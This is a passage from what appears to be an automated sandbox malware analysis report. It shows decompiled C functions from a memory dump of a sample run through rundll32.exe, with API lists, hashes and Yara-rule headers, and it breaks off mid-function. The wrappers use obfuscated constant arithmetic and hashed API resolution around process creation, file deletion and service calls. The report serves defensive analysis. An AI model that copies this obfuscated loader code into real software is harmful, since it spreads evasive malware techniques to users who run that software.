                                          0x0022c738
                                          0x0022c751
                                          0x0022c762
                                          0x0022c768

                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0022C762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: 9aff3a284bdbc7005846512a2e192847c3488d4c6c202e5d49d862151a6953d0
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: 711133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3B14B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00221000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E00221000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0022602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002307A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                          0x00221006
                                          0x00221009
                                          0x0022100c
                                          0x00221011
                                          0x00221016
                                          0x0022101d
                                          0x00221026
                                          0x0022102d
                                          0x00221034
                                          0x0022103b
                                          0x00221047
                                          0x0022104f
                                          0x00221057
                                          0x0022105e
                                          0x00221065
                                          0x0022106c
                                          0x00221073
                                          0x00221077
                                          0x0022108b
                                          0x00221096
                                          0x0022109b

                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 00221096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 9b0b4243c09f153743ba963f172af61627f32187394d3e2d1bec8dfbc1c5dfe0
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: 8C015BB6D01308BBDF04DFA4C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00224859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00224859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002307A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                          0x0022485e
                                          0x0022487a
                                          0x0022487d
                                          0x00224884
                                          0x0022488b
                                          0x00224892
                                          0x0022489d
                                          0x002248a0
                                          0x002248ad
                                          0x002248b7

                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 002248B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: 81f399a38b3290deff4e9d0da5b8e83badc44d24b0f9d8852c102545871cb71b
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 7AF017B0A15209FBDB04CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00234F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E00234F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002307A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                          0x00234f80
                                          0x00234f81
                                          0x00234f82
                                          0x00234f86
                                          0x00234f87
                                          0x00234f8c
                                          0x00234fa5
                                          0x00234fa8
                                          0x00234faf
                                          0x00234fb6
                                          0x00234fc7
                                          0x00234fca
                                          0x00234fd7
                                          0x00234fe2
                                          0x00234fe7

                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 00234FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: 425c42de30eaec02a6b06aeb807420b13a9b3e840beb4bdeece3b006ea06cbfa
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: E9F037B181120CFFDB04DFA4D98689EBFBAEB40300F208199E804AB250D3715B50AB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0023976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 21%
                                          			E0023976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002307A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                          0x00239772
                                          0x00239773
                                          0x00239778
                                          0x0023977a
                                          0x0023977b
                                          0x0023977e
                                          0x0023977f
                                          0x00239782
                                          0x00239785
                                          0x00239788
                                          0x00239789
                                          0x0023978c
                                          0x0023978f
                                          0x00239790
                                          0x00239791
                                          0x00239794
                                          0x00239797
                                          0x0023979a
                                          0x0023979d
                                          0x002397a0
                                          0x002397a3
                                          0x002397a6
                                          0x002397a7
                                          0x002397a8
                                          0x002397ad
                                          0x002397b7
                                          0x002397c3
                                          0x002397ca
                                          0x002397d1
                                          0x002397d8
                                          0x002397df
                                          0x002397e3
                                          0x002397fc
                                          0x00239816
                                          0x0023981d

                                          APIs
                                          • CreateProcessW.KERNEL32(0022591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0022591A), ref: 00239816
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: 9a7324920c6fa73872278b88570e0d2bf5650161ff1a26a3230580b4f81e3e9e
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 3B11B072911188BBDF1A9FD6DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022B566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 31%
                                          			E0022B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0022602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002307A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                          0x0022b569
                                          0x0022b56a
                                          0x0022b56d
                                          0x0022b572
                                          0x0022b574
                                          0x0022b577
                                          0x0022b57a
                                          0x0022b57d
                                          0x0022b580
                                          0x0022b583
                                          0x0022b586
                                          0x0022b587
                                          0x0022b58a
                                          0x0022b58d
                                          0x0022b590
                                          0x0022b593
                                          0x0022b594
                                          0x0022b595
                                          0x0022b59a
                                          0x0022b5a4
                                          0x0022b5b8
                                          0x0022b5c0
                                          0x0022b5c4
                                          0x0022b5cb
                                          0x0022b5d2
                                          0x0022b5d9
                                          0x0022b5e6
                                          0x0022b5fd
                                          0x0022b604

                                          APIs
                                          • CreateFileW.KERNELBASE(00230668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00230668,?,?,?,?), ref: 0022B5FD
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: e1549cc0f43a334951d18b49cf8d68a4c31339b5c1d8a32f795c95a95794c2c5
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 8511C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0023981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E0023981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002307A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                          0x00239821
                                          0x00239822
                                          0x00239825
                                          0x00239828
                                          0x0023982a
                                          0x0023982c
                                          0x0023982f
                                          0x00239832
                                          0x00239835
                                          0x00239836
                                          0x00239837
                                          0x0023983c
                                          0x00239855
                                          0x00239858
                                          0x0023985f
                                          0x00239866
                                          0x0023986d
                                          0x00239874
                                          0x0023987b
                                          0x0023988e
                                          0x0023989b
                                          0x002398a2

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002287F2,0000CAAE,0000510C,AD82F196), ref: 0023989B
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: befe9fe0183202295763c4f616bb3e888194596f68a67a8b2acadb36196cd915
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: 92015A76801208FBDB04EFE5DC46CDFBF79EF85750F108199F918A6220E6719B619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00237BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E00237BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002307A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                          0x00237bf7
                                          0x00237bf8
                                          0x00237bfa
                                          0x00237bfd
                                          0x00237bff
                                          0x00237c02
                                          0x00237c06
                                          0x00237c07
                                          0x00237c0f
                                          0x00237c1d
                                          0x00237c25
                                          0x00237c2d
                                          0x00237c31
                                          0x00237c38
                                          0x00237c3f
                                          0x00237c46
                                          0x00237c4a
                                          0x00237c5e
                                          0x00237c67
                                          0x00237c6d

                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00237C67
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: 0e41601c5170870fff14c69e3aeec768b21d7b82c6e0726c682f4726547fb5ef
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: D2014FB190120CFFEB09DFA4D84A8DEBBB5EF44314F108198F40567240E6B15F609B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022F65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 52%
                                          			E0022F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002307A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                          0x0022f662
                                          0x0022f663
                                          0x0022f665
                                          0x0022f668
                                          0x0022f66a
                                          0x0022f66d
                                          0x0022f670
                                          0x0022f673
                                          0x0022f677
                                          0x0022f678
                                          0x0022f67d
                                          0x0022f687
                                          0x0022f693
                                          0x0022f69a
                                          0x0022f6a1
                                          0x0022f6a5
                                          0x0022f6a9
                                          0x0022f6b0
                                          0x0022f6c9
                                          0x0022f6d8
                                          0x0022f6de

                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0022F6D8
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: c219bc23b31abedc45fcf728708936782f9d9bba77c4ca36990c459a2553eb13
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 3001E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25F21EBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022B6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0022B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0022602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002307A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                          0x0022b6f3
                                          0x0022b6f8
                                          0x0022b702
                                          0x0022b70b
                                          0x0022b712
                                          0x0022b719
                                          0x0022b720
                                          0x0022b727
                                          0x0022b72e
                                          0x0022b747
                                          0x0022b759
                                          0x0022b75e

                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0022B759
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 805ceceae2d365355b6515513bd125146e4d87094100ab013cfcd0affd305b92
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: 99012CB6951308FBEB45DF94DD06A9E7BB5EB14704F108188FA0566190D3B15A20AB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0023AA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0023AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002307A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                          0x0023aa3f
                                          0x0023aa40
                                          0x0023aa41
                                          0x0023aa44
                                          0x0023aa47
                                          0x0023aa4b
                                          0x0023aa4c
                                          0x0023aa51
                                          0x0023aa5b
                                          0x0023aa64
                                          0x0023aa68
                                          0x0023aa6f
                                          0x0023aa76
                                          0x0023aa8d
                                          0x0023aa90
                                          0x0023aa9d
                                          0x0023aaa8
                                          0x0023aaad

                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0023AAA8
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: 9cd5d96fc3e82e5584044280d79d9400fa05233e4d0ba42093466a1b2956cd93
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 37F069B191020CFFDF08DFA4DD4A89EBFB4EB40304F108088F805A6250D3B29B649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00225FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E00225FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002307A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                          0x00225fb5
                                          0x00225fb6
                                          0x00225fb7
                                          0x00225fbb
                                          0x00225fbc
                                          0x00225fc1
                                          0x00225fcb
                                          0x00225fd7
                                          0x00225fde
                                          0x00225fe5
                                          0x00225ffc
                                          0x00225fff
                                          0x00226006
                                          0x0022600d
                                          0x0022601a
                                          0x00226025
                                          0x0022602a

                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00226025
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 387793bae81884d9a14c57a036e56674b9d0b2d7ca770b560513c090cdc2bd9c
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: 88F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F208198E409A7260E7B19F159F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Analysis Process: rundll32.exe PID: 2884 Parent PID: 2808 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 007A2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E007A2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E007A602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E007B07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
